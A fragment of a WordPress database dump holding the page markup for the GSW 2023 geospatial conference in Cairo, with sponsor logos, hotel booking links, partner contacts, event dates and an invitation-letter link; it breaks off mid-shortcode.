(5087,1,'2023-08-08 15:27:40','2023-08-08 15:27:40','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508455960{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" 